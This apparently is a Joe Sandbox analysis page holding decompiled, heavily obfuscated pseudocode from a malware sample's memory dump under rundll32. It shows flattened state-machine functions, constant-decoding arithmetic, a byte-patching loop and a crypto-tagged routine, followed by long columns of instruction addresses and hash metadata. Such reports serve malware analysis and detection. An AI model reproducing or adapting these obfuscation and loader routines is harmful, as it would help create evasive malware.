				_v180 = _v180 | 0x3e03c42f;
				_v180 = _v180 ^ 0xfe5c53ad;
				_v248 = 0x57862;
				_v248 = _v248 | 0x3f7dcfba;
				_v248 = _v248 / _t461;
				_t462 = 0x62;
				_v248 = _v248 / _t462;
				_v248 = _v248 ^ 0x00057d9a;
				_v252 = 0x68f561;
				_v252 = _v252 << 6;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 | 0x3cddc102;
				_v252 = _v252 ^ 0x3cda88f2;
				_v192 = 0x7c8e99;
				_v192 = _v192 + 0x829c;
				_v192 = _v192 * 0x31;
				_v192 = _v192 ^ 0x17fda794;
				_v228 = 0x74d91a;
				_v228 = _v228 << 3;
				_v228 = _v228 + 0x7502;
				_v228 = _v228 * 0x63;
				_v228 = _v228 ^ 0x69a7ce60;
				_v208 = 0xc909ae;
				_v208 = _v208 << 1;
				_t463 = 0xb;
				_v208 = _v208 / _t463;
				_v208 = _v208 ^ 0x00276772;
				_v164 = 0x673800;
				_v164 = _v164 << 9;
				_v164 = _v164 ^ 0xce7e8a93;
				_v232 = 0xb859bd;
				_v232 = _v232 + 0xde76;
				_t464 = 0x5b;
				_v232 = _v232 * 0x1c;
				_v232 = _v232 * 0x30;
				_v232 = _v232 ^ 0xcc63b0a7;
				_v172 = 0x7eda56;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0x03f50911;
				_v184 = 0x2f7891;
				_v184 = _v184 / _t464;
				_t465 = 0x41;
				_v184 = _v184 * 0x49;
				_v184 = _v184 ^ 0x0024fbf7;
				_v148 = 0x4a0bea;
				_v148 = _v148 ^ 0x502016f1;
				_v148 = _v148 ^ 0x506ad42a;
				_v260 = 0x9ebd58;
				_v260 = _v260 >> 8;
				_v260 = _v260 << 0xf;
				_v260 = _v260 + 0xb306;
				_v260 = _v260 ^ 0x4f54a3e8;
				_v204 = 0xce3506;
				_v204 = _v204 << 0xf;
				_v204 = _v204 << 0xc;
				_v204 = _v204 ^ 0x300ddb73;
				_v244 = 0xe7c592;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x506a7775;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0xa0d2afa7;
				_v268 = 0x1d8a79;
				_v268 = _v268 << 2;
				_v268 = _v268 / _t465;
				_v268 = _v268 | 0x253986a4;
				_v268 = _v268 ^ 0x2531568a;
				_v216 = 0x116531;
				_t466 = 0x61;
				_v216 = _v216 * 0x66;
				_v216 = _v216 ^ 0xfffdc9ed;
				_v216 = _v216 ^ 0xf917010b;
				_v200 = 0xc05f9c;
				_v200 = _v200 / _t466;
				_v200 = _v200 * 0x6f;
				_v200 = _v200 ^ 0x00dca3d1;
				_v212 = 0xdb89ea;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 >> 9;
				_v212 = _v212 ^ 0x0000ad8d;
				_v152 = 0x38fb70;
				_v152 = _v152 ^ 0x310cc67b;
				_v152 = _v152 ^ 0x313af23a;
				_v136 = 0x7e2008;
				_v136 = _v136 ^ 0x7ad3030b;
				_v136 = _v136 ^ 0x7aaaa86e;
				_v196 = 0x9c4278;
				_t467 = 0x4e;
				_v196 = _v196 * 0x7e;
				_v196 = _v196 ^ 0xa26962db;
				_v196 = _v196 ^ 0xee89d9da;
				_v220 = 0x1e88f4;
				_v220 = _v220 >> 4;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000c14cc;
				_v140 = 0xc2e6ba;
				_v140 = _v140 + 0x8875;
				_v140 = _v140 ^ 0x00c43ba1;
				_v188 = 0xdb74c;
				_v188 = _v188 << 4;
				_v188 = _v188 * 0x5c;
				_v188 = _v188 ^ 0x4edda20a;
				_v236 = 0x62ea5;
				_v236 = _v236 / _t467;
				_v236 = _v236 >> 0xb;
				_v236 = _v236 ^ 0x7372adb3;
				_v236 = _v236 ^ 0x73757ff2;
				_v144 = 0x2b6271;
				_v144 = _v144 ^ 0x1ac7dce1;
				_v144 = _v144 ^ 0x1ae73668;
				_v224 = 0x8bb898;
				_v224 = _v224 + 0x43a9;
				_v224 = _v224 << 0x10;
				_t468 = 0x71;
				_t469 = _v132;
				_v224 = _v224 / _t468;
				_v224 = _v224 ^ 0x023712cd;
				_v156 = 0xb23c07;
				_v156 = _v156 + 0x4ded;
				_v156 = _v156 ^ 0x00b7ca1c;
				_v168 = 0xb501ce;
				_v168 = _v168 ^ 0x6706c67f;
				_v168 = _v168 ^ 0x67b3c7a1;
				_v176 = 0xab8984;
				_v176 = _v176 * 0x22;
				_v176 = _v176 ^ 0x16c84308;
				goto L1;
				do {
					while(1) {
						L1:
						_t474 = _t408 - 0xd9acfaa;
						if(_t474 > 0) {
							break;
						}
						if(_t474 == 0) {
							E002E8519(_v236, _v144, _v128);
							_t408 = 0xfbb751f;
							continue;
						}
						if(_t408 == 0x15a913b) {
							_v40 = _t456;
							_v92 =  &_v32;
							_v56 =  *_t455;
							_v52 =  *((intOrPtr*)(_t455 + 4));
							_v88 = 0x20;
							_t393 = E002D7735(_v192,  &_v112,  &_v120, _v228, _v208);
							_t471 = _t471 + 0x10;
							if(_t393 == 0) {
								L20:
								return _v132;
							}
							_t408 = 0xf0a856e;
							continue;
						}
						if(_t408 == 0x3749e66) {
							_t469 = E002E0AE0(_v176, _v168);
							_t408 = 0x46acfc9;
							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
							continue;
						}
						if(_t408 == 0x46acfc9) {
							_push(_t408);
							_push(_t408);
							_t403 = E002D7FF2( *((intOrPtr*)(_t406 + 4)));
							 *_t406 = _t403;
							if(_t403 == 0) {
								_t408 = 0xd9acfaa;
							} else {
								_v132 = 1;
								_t408 = 0xfb3baa2;
							}
							continue;
						}
						if(_t408 != 0x8e80a37) {
							goto L31;
						}
						_t408 = 0xfac38db;
					}
					if(_t408 == 0xf0a856e) {
						_t377 = E002D70B3(_v164,  &_v128,  &_v120, _v232, _v172);
						_t471 = _t471 + 0xc;
						if(_t377 == 0) {
							_t408 = 0xfbb751f;
							goto L31;
						}
						_t408 = 0x3749e66;
						goto L1;
					}
					if(_t408 == 0xfac38db) {
						_push( *_t455);
						_t378 = E002EAE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
						_t471 = _t471 + 0x14;
						if(_t378 == 0) {
							goto L20;
						}
						_t408 = 0x15a913b;
						goto L1;
					}
					if(_t408 == 0xfb3baa2) {
						_t457 =  *_t406;
						E002D7E87(_v268, _v216, _v200, _t457);
						_t458 = _t457 + _v264;
						E002DED7E(_v212, _t458, _v152, _v128, _v124);
						_t459 = _t458 + _v124;
						E002DA492(_v196, _v220, _t459, _t469);
						_t450 =  &(_t459[_t469]);
						_t471 = _t471 + 0x20;
						_t414 = _t459;
						if(_t459 >= _t450) {
							L25:
							_t386 = E002E0AE0(0xe, 0);
							_t408 = 0xd9acfaa;
							 *((char*)(_t386 + _t459)) = 0;
							_t456 = _a4;
							goto L1;
						} else {
							goto L22;
						}
						do {
							L22:
							if(( *_t414 & 0x000000ff) == _v256) {
								 *_t414 = 0xc3;
							}
							_t414 =  &(_t414[1]);
						} while (_t414 < _t450);
						goto L25;
					}
					if(_t408 != 0xfbb751f) {
						goto L31;
					}
					E002E8519(_v224, _v156, _v120);
					goto L20;
					L31:
				} while (_t408 != 0x5927677);
				goto L20;
			}












































































                                                                                                                                  0x002dcf4e
                                                                                                                                  0x002dcf57
                                                                                                                                  0x002dcf5f
                                                                                                                                  0x002dcf66
                                                                                                                                  0x002dcf6d
                                                                                                                                  0x002dcf6e
                                                                                                                                  0x002dcf75
                                                                                                                                  0x002dcf76
                                                                                                                                  0x002dcf77
                                                                                                                                  0x002dcf78
                                                                                                                                  0x002dcf79
                                                                                                                                  0x002dcf7e
                                                                                                                                  0x002dcf86
                                                                                                                                  0x002dcf89
                                                                                                                                  0x002dcf93
                                                                                                                                  0x002dcf98
                                                                                                                                  0x002dcf9d
                                                                                                                                  0x002dcfa5
                                                                                                                                  0x002dcfad
                                                                                                                                  0x002dcfb8
                                                                                                                                  0x002dcfc0
                                                                                                                                  0x002dcfcb
                                                                                                                                  0x002dcfd3
                                                                                                                                  0x002dcfdb
                                                                                                                                  0x002dcfe3
                                                                                                                                  0x002dcfeb
                                                                                                                                  0x002dcff3
                                                                                                                                  0x002dd001
                                                                                                                                  0x002dd006
                                                                                                                                  0x002dd00c
                                                                                                                                  0x002dd015
                                                                                                                                  0x002dd018
                                                                                                                                  0x002dd020
                                                                                                                                  0x002dd024
                                                                                                                                  0x002dd02c
                                                                                                                                  0x002dd034
                                                                                                                                  0x002dd03c
                                                                                                                                  0x002dd044
                                                                                                                                  0x002dd04c
                                                                                                                                  0x002dd054
                                                                                                                                  0x002dd064
                                                                                                                                  0x002dd06c
                                                                                                                                  0x002dd06f
                                                                                                                                  0x002dd073
                                                                                                                                  0x002dd07b
                                                                                                                                  0x002dd083
                                                                                                                                  0x002dd088
                                                                                                                                  0x002dd08d
                                                                                                                                  0x002dd095
                                                                                                                                  0x002dd09d
                                                                                                                                  0x002dd0a5
                                                                                                                                  0x002dd0b2
                                                                                                                                  0x002dd0b6
                                                                                                                                  0x002dd0be
                                                                                                                                  0x002dd0c6
                                                                                                                                  0x002dd0cb
                                                                                                                                  0x002dd0d8
                                                                                                                                  0x002dd0dc
                                                                                                                                  0x002dd0e4
                                                                                                                                  0x002dd0ec
                                                                                                                                  0x002dd0f8
                                                                                                                                  0x002dd0fd
                                                                                                                                  0x002dd103
                                                                                                                                  0x002dd10b
                                                                                                                                  0x002dd116
                                                                                                                                  0x002dd11e
                                                                                                                                  0x002dd129
                                                                                                                                  0x002dd131
                                                                                                                                  0x002dd13e
                                                                                                                                  0x002dd141
                                                                                                                                  0x002dd14a
                                                                                                                                  0x002dd14e
                                                                                                                                  0x002dd156
                                                                                                                                  0x002dd15e
                                                                                                                                  0x002dd163
                                                                                                                                  0x002dd16b
                                                                                                                                  0x002dd17b
                                                                                                                                  0x002dd184
                                                                                                                                  0x002dd187
                                                                                                                                  0x002dd18b
                                                                                                                                  0x002dd193
                                                                                                                                  0x002dd19e
                                                                                                                                  0x002dd1a9
                                                                                                                                  0x002dd1b4
                                                                                                                                  0x002dd1bc
                                                                                                                                  0x002dd1c1
                                                                                                                                  0x002dd1c6
                                                                                                                                  0x002dd1ce
                                                                                                                                  0x002dd1d6
                                                                                                                                  0x002dd1de
                                                                                                                                  0x002dd1e3
                                                                                                                                  0x002dd1e8
                                                                                                                                  0x002dd1f0
                                                                                                                                  0x002dd1f8
                                                                                                                                  0x002dd1fd
                                                                                                                                  0x002dd205
                                                                                                                                  0x002dd209
                                                                                                                                  0x002dd211
                                                                                                                                  0x002dd219
                                                                                                                                  0x002dd226
                                                                                                                                  0x002dd22a
                                                                                                                                  0x002dd232
                                                                                                                                  0x002dd23a
                                                                                                                                  0x002dd247
                                                                                                                                  0x002dd248
                                                                                                                                  0x002dd24c
                                                                                                                                  0x002dd254
                                                                                                                                  0x002dd25c
                                                                                                                                  0x002dd26a
                                                                                                                                  0x002dd273
                                                                                                                                  0x002dd277
                                                                                                                                  0x002dd27f
                                                                                                                                  0x002dd287
                                                                                                                                  0x002dd28c
                                                                                                                                  0x002dd291
                                                                                                                                  0x002dd299
                                                                                                                                  0x002dd2a4
                                                                                                                                  0x002dd2af
                                                                                                                                  0x002dd2ba
                                                                                                                                  0x002dd2c5
                                                                                                                                  0x002dd2d0
                                                                                                                                  0x002dd2db
                                                                                                                                  0x002dd2ec
                                                                                                                                  0x002dd2ef
                                                                                                                                  0x002dd2f3
                                                                                                                                  0x002dd2fb
                                                                                                                                  0x002dd303
                                                                                                                                  0x002dd30b
                                                                                                                                  0x002dd310
                                                                                                                                  0x002dd315
                                                                                                                                  0x002dd31d
                                                                                                                                  0x002dd328
                                                                                                                                  0x002dd333
                                                                                                                                  0x002dd33e
                                                                                                                                  0x002dd346
                                                                                                                                  0x002dd350
                                                                                                                                  0x002dd354
                                                                                                                                  0x002dd35c
                                                                                                                                  0x002dd36c
                                                                                                                                  0x002dd370
                                                                                                                                  0x002dd375
                                                                                                                                  0x002dd37d
                                                                                                                                  0x002dd385
                                                                                                                                  0x002dd390
                                                                                                                                  0x002dd39b
                                                                                                                                  0x002dd3a6
                                                                                                                                  0x002dd3ae
                                                                                                                                  0x002dd3b6
                                                                                                                                  0x002dd3bf
                                                                                                                                  0x002dd3c2
                                                                                                                                  0x002dd3c9
                                                                                                                                  0x002dd3cd
                                                                                                                                  0x002dd3d5
                                                                                                                                  0x002dd3e0
                                                                                                                                  0x002dd3eb
                                                                                                                                  0x002dd3f6
                                                                                                                                  0x002dd3fe
                                                                                                                                  0x002dd406
                                                                                                                                  0x002dd40e
                                                                                                                                  0x002dd41b
                                                                                                                                  0x002dd41f
                                                                                                                                  0x002dd41f
                                                                                                                                  0x002dd427
                                                                                                                                  0x002dd427
                                                                                                                                  0x002dd427
                                                                                                                                  0x002dd427
                                                                                                                                  0x002dd42d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd433
                                                                                                                                  0x002dd553
                                                                                                                                  0x002dd559
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd559
                                                                                                                                  0x002dd43f
                                                                                                                                  0x002dd4e3
                                                                                                                                  0x002dd4f6
                                                                                                                                  0x002dd4ff
                                                                                                                                  0x002dd509
                                                                                                                                  0x002dd51f
                                                                                                                                  0x002dd52b
                                                                                                                                  0x002dd530
                                                                                                                                  0x002dd535
                                                                                                                                  0x002dd5a7
                                                                                                                                  0x002dd5b8
                                                                                                                                  0x002dd5b8
                                                                                                                                  0x002dd537
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd537
                                                                                                                                  0x002dd44b
                                                                                                                                  0x002dd4b7
                                                                                                                                  0x002dd4cb
                                                                                                                                  0x002dd4d0
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd4d0
                                                                                                                                  0x002dd453
                                                                                                                                  0x002dd477
                                                                                                                                  0x002dd478
                                                                                                                                  0x002dd479
                                                                                                                                  0x002dd47e
                                                                                                                                  0x002dd484
                                                                                                                                  0x002dd498
                                                                                                                                  0x002dd486
                                                                                                                                  0x002dd486
                                                                                                                                  0x002dd491
                                                                                                                                  0x002dd491
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd484
                                                                                                                                  0x002dd45b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd461
                                                                                                                                  0x002dd461
                                                                                                                                  0x002dd569
                                                                                                                                  0x002dd6ac
                                                                                                                                  0x002dd6b1
                                                                                                                                  0x002dd6b6
                                                                                                                                  0x002dd6c2
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd6c2
                                                                                                                                  0x002dd6b8
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd6b8
                                                                                                                                  0x002dd575
                                                                                                                                  0x002dd65b
                                                                                                                                  0x002dd674
                                                                                                                                  0x002dd679
                                                                                                                                  0x002dd67e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd684
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd684
                                                                                                                                  0x002dd581
                                                                                                                                  0x002dd5b9
                                                                                                                                  0x002dd5c8
                                                                                                                                  0x002dd5d1
                                                                                                                                  0x002dd5ee
                                                                                                                                  0x002dd5f3
                                                                                                                                  0x002dd60e
                                                                                                                                  0x002dd613
                                                                                                                                  0x002dd616
                                                                                                                                  0x002dd619
                                                                                                                                  0x002dd61d
                                                                                                                                  0x002dd630
                                                                                                                                  0x002dd63f
                                                                                                                                  0x002dd646
                                                                                                                                  0x002dd64b
                                                                                                                                  0x002dd64f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd61f
                                                                                                                                  0x002dd61f
                                                                                                                                  0x002dd626
                                                                                                                                  0x002dd628
                                                                                                                                  0x002dd628
                                                                                                                                  0x002dd62b
                                                                                                                                  0x002dd62c
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd61f
                                                                                                                                  0x002dd589
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd5a1
                                                                                                                                  0x00000000
                                                                                                                                  0x002dd6c7
                                                                                                                                  0x002dd6c7
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                                  • API String ID: 0-3591755710
                                                                                                                                  • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                  • Instruction ID: 2c71b519eddf28031915e384fe40edbff7abcd168f108928507b7c69e8b40669
                                                                                                                                  • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                                  • Instruction Fuzzy Hash: 751231715183818FD368CF25C486A5BFBF1FBC4348F50891EF69A8A261DBB19958CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E907F Relevance: 7.8, Strings: 6, Instructions: 261COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002E907F(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t284;
				void* _t285;
				intOrPtr _t286;
				void* _t293;
				void* _t301;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t311;
				intOrPtr* _t343;
				void* _t347;
				signed int* _t348;

				_t348 =  &_v132;
				_t343 = __ecx;
				_v4 = __ecx;
				_v40 = 0x7c806d;
				_v40 = _v40 + 0x9e80;
				_v40 = _v40 ^ 0x007d1eed;
				_v12 = 0xea5ac0;
				_v12 = _v12 + 0xffff451e;
				_v12 = _v12 ^ 0x00e99fde;
				_v24 = 0xace3a9;
				_t347 = 0;
				_t304 = 0xa;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x001149f7;
				_t301 = 0x97dfe60;
				_v112 = 0x63471f;
				_v112 = _v112 ^ 0x706c6b64;
				_v112 = _v112 | 0x0d4cecae;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0xea7f67f8;
				_v28 = 0x68a2fc;
				_t305 = 0x5b;
				_v28 = _v28 * 0x1c;
				_v28 = _v28 ^ 0x0b71d390;
				_v84 = 0x508d02;
				_v84 = _v84 | 0x7bfb7ba7;
				_v84 = _v84 ^ 0x7bffa5e3;
				_v124 = 0xc0d8a4;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 ^ 0xdba96bec;
				_v124 = _v124 + 0xffffcd63;
				_v124 = _v124 ^ 0xdb66cc39;
				_v116 = 0xc7a01f;
				_v116 = _v116 * 0x50;
				_v116 = _v116 << 7;
				_v116 = _v116 + 0x525d;
				_v116 = _v116 ^ 0x3100192e;
				_v88 = 0x173e76;
				_v88 = _v88 / _t305;
				_v88 = _v88 + 0xcdb8;
				_v88 = _v88 ^ 0x00098d3b;
				_v48 = 0x3a45de;
				_t306 = 0x3d;
				_v48 = _v48 / _t306;
				_v48 = _v48 ^ 0x0006d702;
				_v52 = 0xd8d0f7;
				_v52 = _v52 | 0xabcf1793;
				_v52 = _v52 + 0xffff6a1e;
				_v52 = _v52 ^ 0xabd8e28c;
				_v64 = 0xff5420;
				_v64 = _v64 >> 9;
				_v64 = _v64 + 0xffff2626;
				_v64 = _v64 ^ 0xfff0768b;
				_v80 = 0x65116e;
				_v80 = _v80 >> 9;
				_v80 = _v80 | 0xde6750c8;
				_v80 = _v80 ^ 0xde6208e1;
				_v56 = 0x2d6903;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 + 0xffff4c70;
				_v56 = _v56 ^ 0xfff58c10;
				_v132 = 0xe5be5a;
				_v132 = _v132 + 0xfffffbec;
				_v132 = _v132 << 3;
				_v132 = _v132 ^ 0x46ad3c03;
				_v132 = _v132 ^ 0x418237eb;
				_v108 = 0x3fa801;
				_v108 = _v108 + 0x902;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x9ac0b97a;
				_v108 = _v108 ^ 0x9ac73a04;
				_v72 = 0x454e35;
				_v72 = _v72 + 0x4c9c;
				_t307 = 0x29;
				_v72 = _v72 / _t307;
				_v72 = _v72 ^ 0x000328df;
				_v32 = 0x46b9f;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0003d4b9;
				_v16 = 0xab007f;
				_v16 = _v16 ^ 0x56a4e801;
				_v16 = _v16 ^ 0x56002f48;
				_v100 = 0xb9d48c;
				_v100 = _v100 | 0xb434f54e;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x000dcd0e;
				_v92 = 0x17070b;
				_t308 = 0x37;
				_v92 = _v92 / _t308;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x0038b56c;
				_v60 = 0xdb418a;
				_v60 = _v60 * 0x4d;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0x07c52fa3;
				_v68 = 0x99d1b0;
				_v68 = _v68 << 1;
				_v68 = _v68 + 0xadc1;
				_v68 = _v68 ^ 0x01384a96;
				_v120 = 0xfb4a64;
				_v120 = _v120 | 0x92bfeeef;
				_v120 = _v120 + 0x1827;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x0494323d;
				_v128 = 0xf75f57;
				_v128 = _v128 >> 4;
				_v128 = _v128 + 0xe158;
				_v128 = _v128 + 0xffff16ce;
				_v128 = _v128 ^ 0x000f9950;
				_v76 = 0xb94cf;
				_v76 = _v76 | 0xc911a6ab;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x3240c46f;
				_v104 = 0x7ca07;
				_v104 = _v104 * 0x23;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0xe4d42587;
				_v104 = _v104 ^ 0xe4c14657;
				_v44 = 0x308a5a;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 ^ 0x0006e55e;
				_v96 = 0x427aa5;
				_v96 = _v96 + 0xed3d;
				_v96 = _v96 + 0xffff13f4;
				_v96 = _v96 ^ 0x0046a078;
				_v20 = 0xf8f4;
				_v20 = _v20 * 0x4a;
				_t284 = 0x4469cd4;
				_v20 = _v20 ^ 0x004ab19f;
				_v36 = 0x7998ac;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x0008cf6c;
				do {
					while(_t301 != _t284) {
						if(_t301 == 0x661bd7c) {
							E002D957D(_v8, _v96, _v20, _v28, _v36);
						} else {
							if(_t301 == 0x8cd68b1) {
								_push(_v116);
								_push(_v124);
								_t293 = E002EDCF7(_v84, 0x2d1954, __eflags);
								_push(_v52);
								_push(_v48);
								__eflags = E002D9462(_t293, _v80,  &_v8, E002EDCF7(_v88, 0x2d1814, __eflags), _v56, _v40) - _v12;
								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
								E002DA8B0(_v132, _t293, _v108);
								E002DA8B0(_v72, _t294, _v32);
								_t343 = _v4;
								L8:
								_t284 = 0x4469cd4;
								_t348 =  &(_t348[0xb]);
								goto L9;
							} else {
								if(_t301 != 0x97dfe60) {
									goto L9;
								} else {
									_t301 = 0x8cd68b1;
									continue;
								}
							}
						}
						L12:
						return _t347;
					}
					_push(_v92);
					_push(_v100);
					_t285 = E002EDCF7(_v16, 0x2d1854, __eflags);
					_pop(_t311);
					_t286 =  *0x2f3dfc; // 0x0
					__eflags = E002DAA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
					_t301 = 0x661bd7c;
					_t347 =  ==  ? 1 : _t347;
					E002DA8B0(_v104, _t285, _v44);
					goto L8;
					L9:
					__eflags = _t301 - 0x94c729c;
				} while (__eflags != 0);
				goto L12;
			}


















































                                                                                                                                  0x002e907f
                                                                                                                                  0x002e9089
                                                                                                                                  0x002e908b
                                                                                                                                  0x002e9092
                                                                                                                                  0x002e909c
                                                                                                                                  0x002e90a4
                                                                                                                                  0x002e90ac
                                                                                                                                  0x002e90b7
                                                                                                                                  0x002e90c2
                                                                                                                                  0x002e90cd
                                                                                                                                  0x002e90db
                                                                                                                                  0x002e90dd
                                                                                                                                  0x002e90e2
                                                                                                                                  0x002e90eb
                                                                                                                                  0x002e90f6
                                                                                                                                  0x002e90fb
                                                                                                                                  0x002e9103
                                                                                                                                  0x002e910b
                                                                                                                                  0x002e9113
                                                                                                                                  0x002e9118
                                                                                                                                  0x002e9120
                                                                                                                                  0x002e912d
                                                                                                                                  0x002e9130
                                                                                                                                  0x002e9134
                                                                                                                                  0x002e913c
                                                                                                                                  0x002e9144
                                                                                                                                  0x002e914c
                                                                                                                                  0x002e9154
                                                                                                                                  0x002e915c
                                                                                                                                  0x002e9164
                                                                                                                                  0x002e916c
                                                                                                                                  0x002e9174
                                                                                                                                  0x002e917c
                                                                                                                                  0x002e9189
                                                                                                                                  0x002e918d
                                                                                                                                  0x002e9192
                                                                                                                                  0x002e919a
                                                                                                                                  0x002e91a2
                                                                                                                                  0x002e91b2
                                                                                                                                  0x002e91b6
                                                                                                                                  0x002e91be
                                                                                                                                  0x002e91c6
                                                                                                                                  0x002e91d2
                                                                                                                                  0x002e91d5
                                                                                                                                  0x002e91d9
                                                                                                                                  0x002e91e1
                                                                                                                                  0x002e91e9
                                                                                                                                  0x002e91f1
                                                                                                                                  0x002e91f9
                                                                                                                                  0x002e9201
                                                                                                                                  0x002e9209
                                                                                                                                  0x002e920e
                                                                                                                                  0x002e9216
                                                                                                                                  0x002e921e
                                                                                                                                  0x002e9226
                                                                                                                                  0x002e922b
                                                                                                                                  0x002e9233
                                                                                                                                  0x002e923b
                                                                                                                                  0x002e9243
                                                                                                                                  0x002e9248
                                                                                                                                  0x002e9250
                                                                                                                                  0x002e9258
                                                                                                                                  0x002e9260
                                                                                                                                  0x002e9268
                                                                                                                                  0x002e926d
                                                                                                                                  0x002e9277
                                                                                                                                  0x002e927f
                                                                                                                                  0x002e9287
                                                                                                                                  0x002e928f
                                                                                                                                  0x002e9294
                                                                                                                                  0x002e929c
                                                                                                                                  0x002e92a4
                                                                                                                                  0x002e92ac
                                                                                                                                  0x002e92ba
                                                                                                                                  0x002e92bf
                                                                                                                                  0x002e92c5
                                                                                                                                  0x002e92cd
                                                                                                                                  0x002e92d5
                                                                                                                                  0x002e92da
                                                                                                                                  0x002e92e2
                                                                                                                                  0x002e92ed
                                                                                                                                  0x002e92f8
                                                                                                                                  0x002e9303
                                                                                                                                  0x002e930b
                                                                                                                                  0x002e9313
                                                                                                                                  0x002e9318
                                                                                                                                  0x002e9320
                                                                                                                                  0x002e932c
                                                                                                                                  0x002e932f
                                                                                                                                  0x002e9333
                                                                                                                                  0x002e9338
                                                                                                                                  0x002e9340
                                                                                                                                  0x002e934d
                                                                                                                                  0x002e9351
                                                                                                                                  0x002e9356
                                                                                                                                  0x002e935e
                                                                                                                                  0x002e9366
                                                                                                                                  0x002e936a
                                                                                                                                  0x002e9372
                                                                                                                                  0x002e937a
                                                                                                                                  0x002e9382
                                                                                                                                  0x002e938a
                                                                                                                                  0x002e9392
                                                                                                                                  0x002e9397
                                                                                                                                  0x002e939f
                                                                                                                                  0x002e93a7
                                                                                                                                  0x002e93ac
                                                                                                                                  0x002e93b4
                                                                                                                                  0x002e93bc
                                                                                                                                  0x002e93c4
                                                                                                                                  0x002e93cc
                                                                                                                                  0x002e93d4
                                                                                                                                  0x002e93d9
                                                                                                                                  0x002e93e1
                                                                                                                                  0x002e93ee
                                                                                                                                  0x002e93f2
                                                                                                                                  0x002e93f7
                                                                                                                                  0x002e93ff
                                                                                                                                  0x002e9407
                                                                                                                                  0x002e940f
                                                                                                                                  0x002e9414
                                                                                                                                  0x002e941c
                                                                                                                                  0x002e9424
                                                                                                                                  0x002e942c
                                                                                                                                  0x002e9434
                                                                                                                                  0x002e943c
                                                                                                                                  0x002e944f
                                                                                                                                  0x002e9456
                                                                                                                                  0x002e945b
                                                                                                                                  0x002e9466
                                                                                                                                  0x002e946e
                                                                                                                                  0x002e9473
                                                                                                                                  0x002e947b
                                                                                                                                  0x002e947b
                                                                                                                                  0x002e9489
                                                                                                                                  0x002e95e5
                                                                                                                                  0x002e948f
                                                                                                                                  0x002e9495
                                                                                                                                  0x002e94aa
                                                                                                                                  0x002e94b3
                                                                                                                                  0x002e94bb
                                                                                                                                  0x002e94c0
                                                                                                                                  0x002e94cb
                                                                                                                                  0x002e950e
                                                                                                                                  0x002e9519
                                                                                                                                  0x002e951c
